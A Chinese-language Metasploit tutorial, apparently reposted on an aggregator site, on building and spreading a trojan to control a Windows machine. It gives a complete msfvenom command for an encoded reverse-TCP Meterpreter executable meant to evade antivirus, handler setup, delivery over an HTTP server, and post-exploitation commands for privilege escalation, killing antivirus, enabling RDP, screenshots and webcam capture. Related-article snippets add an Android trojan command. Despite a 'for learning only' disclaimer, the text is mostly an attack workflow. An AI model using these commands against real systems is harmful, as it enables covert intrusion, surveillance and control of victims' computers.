msf渗透练习-生成木马控制window系统

这篇具有很好参考价值的文章主要介绍了msf渗透练习-生成木马控制window系统。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

说明: 本章内容,仅供学习,不要用于非法用途(做个好白帽)

(一)生成木马

命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.23.46 LPORT=4444 -e x86/shikata_ga_nai -f exe -o shell.exe -i 5

-p:设置payload,也就是要生成的可执行文件的类型和功能,这里选择的是Windows Meterpreter反向Shell。

        LHOST:指定Metasploit服务器(kali)监听的IP地址,

        LPORT:指定Metasploit服务器(kali)监听的端口,

-e:指定加密算法,这里使用的是shikata_ga_nai,这是一个简单的Polymorphic XOR加密算法,用来避免反病毒软件的检测。

-f:指定生成的可执行文件的格式,这里选择的是exe格式。

-o:指定生成的文件名为shell.exe。

-i:指定加密算法的迭代次数,即对生成的payload进行几次加密。
 

整个命令的意思是,将生成一个Windows反向TCP Meterpreter Shell的可执行文件,通过Metasploit连接到指定的主机和端口,使用shikata_ga_nai算法进行多次加密,生成exe格式的文件,存储为shell.exe。

 msf渗透练习-生成木马控制window系统

 (二)配置监控

1、启动msf :msfconsole

2、载入监控模块  :use exploit/multi/handler

3、加载payload
msf渗透练习-生成木马控制window系统

 
4、查看plyload需要配置的参数

5、设置plyload的参数
msf渗透练习-生成木马控制window系统


6、开始监听:run
msf渗透练习-生成木马控制window系统

(三) 传播木马

当通过各种方法,各种路径传播木马到目标主机之后,等待目标主机运行木马程序,我们就能控制目标主机

这里练习我就用http服务传播

1、开启http服务:

  python2 -m SimpleHTTPServer 80 

msf渗透练习-生成木马控制window系统

2、靶机访问kali地址,下载木马文件

msf渗透练习-生成木马控制window系统

3、当用户运行木马程序,就可以出现

msf渗透练习-生成木马控制window系统

(四)后渗透

当利用木马成功控制window之后,就可以干我们像干的事情了,(不能用于非法用途,做个好白帽)

msf渗透练习-生成木马控制window系统

 msf渗透练习-生成木马控制window系统

 msf渗透练习-生成木马控制window系统

还有一些命令:

查看进程:ps

查看当前进程号:getpid

查看系统信息:sysinfo

查看目标机是否为虚拟机:run post/windows/gather/checkvm

查看完整网络设置:route

查看当前权限:getuid

自动提权:getsystem

关闭杀毒软件:run post/windows/manage/killav

启动远程桌面协议:run post/windows/manage/enable_rdp

列举当前登录的用户:run post/windows/gather/enum_logged_on_users

查看当前应用程序:run post/windows/gather/enum_applications

抓取目标机的屏幕截图:load espia ; screengrab

抓取摄像头的照片:webcam_snap

查看当前处于目标机的那个目录:pwd

查看当前目录:getlwd文章来源地址https://www.toymoban.com/news/detail-481574.html

到了这里,关于msf渗透练习-生成木马控制window系统的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • msf使用木马控制android手机

    msf使用木马控制android手机 kali、手机模拟器(或不用的手机)。 手机模拟器(或者手机)与电脑可以互相连通吗,即手机可以直接访问到kali。 命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.32.135 lport=4444 android_shell.apk ; 2、手机安装木马。 想办法把木马放到手机模拟器(

    2024年02月10日
    浏览(33)
  • msf渗透练习-震网三代

      说明: 本章内容,仅供学习,不要用于非法用途(做个好白帽) “震网三代”官方漏洞编号是CVE-2017-8464,2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径

    2024年02月09日
    浏览(30)
  • 【黑客渗透】-- 远程木马控制

    目录 系列文章目录 文章目录 网络搭建系列:网络攻击 Windows服务器搭建系列:Windwos服务器搭建  渗透系列:  前言 一、什么是木马远程控制? 二、正文 1)实验目的 2)实验背景 3)实验设备 4)实验配置 1.实验设备均在VMnet 2中  2.实验设备IP 3.实验软件 4.测试连通性 5.打开软件 6.利用

    2024年02月19日
    浏览(25)
  • Kali Linux利用MSF渗透Windows11电脑

    目录 一、MSF简介 渗透环境 二、渗透流程 1.Kali Linux进入Root模式  2.生成可执行文件 3.运行msfconsole命令  4.配置参数  5.在靶机Windows11打开可执行文件 6.渗透 Msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayloa

    2024年02月06日
    浏览(31)
  • Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用

    博主根据日后学习会不断更新文章,后续用到新的功能会不定时更新。 以下内容只供学习使用,请勿违法使用! 目录 一、常用指令 二、监听模块 2.1 防止假session 2.2 实现后台持续监听 三、msfvenom(payload生成模块) 3.1 参数介绍 3.2 常用指令 3.3 payload 生成 3.3.1 Linux 3.3.2 Windows

    2024年02月07日
    浏览(33)
  • 内网渗透—代理Socks协议、路由不出网、后渗透通讯、CS-MSF控制上线

      本章主要涉及到的技术就是如何让攻击机通过能够上网的主机当作跳板去连接内网中不能上网的主机,有点绕口。不过通过介绍页能够大概明白是什么意思。   在我们做渗透的时候,通常企业都会设定有些软硬件防火墙,当企业有业务需求的时候会通过防火墙放通地址

    2024年02月05日
    浏览(45)
  • Kali Linux使用MSF木马入侵安卓手机

    声明: 本文章仅做娱乐和学习,切勿非法使用!! 本人技术一般,水平有限,如有不对请多多指正。 Kali Linux 安卓手机一部(安卓11) 要想玩的好,总不能本地玩自己吧,也得和周边朋友开个玩笑吧,所以就得做内网穿透了,免费内网穿透可以看这位大佬的 CSDN博主「Lisa

    2024年01月24日
    浏览(30)
  • 【git】git ssh 公钥私钥 在 windows和mac 双系统分别如何生成 以及对接各个平台说明

    win和mac 双系统分别如何生成 git ssh windows版本需要下载git bash:https://gitforwindows.org/ 在 git bash 中输入如下指令: 这里需要注意这条指令 ssh-keygen -t rsa -C \\\"xx@qq.com\\\" 如果一路回车则生成的默认为一个私钥 id_rsa 和公钥 id_rsa.pub,且路径为 /c/Users/你的用户名/.ssh/ ,一旦我们指定名称

    2024年02月17日
    浏览(47)
  • metasploit(MSF)渗透超细解说 -- 小黑渗透工具

    metasploit Framework(msf)里带数千个已知的软件漏洞,并保持持续更新,Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,采用Ruby语言编写。黑掉整个宇宙的称号!!! 初心:    记录msfconsole的渗透测试流程,以及每个流程点常用到的一些命令,其中还有

    2024年01月20日
    浏览(32)
  • 渗透测试神器-msf基础

    Metasploit-framework(用ruby写的)基础: MSF拥有世界上最大的渗透测试攻击数据库 Vulnerability:漏洞统称 expoit:攻击代码或者程序 Payload:完成实际攻击功能的代码 module:组成完整系统的基本构造块,每个模块执行特定任务 运行msf: msf模块介绍: Exploit:msf最核心的模块,里面有针对

    2024年02月05日
    浏览(69)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包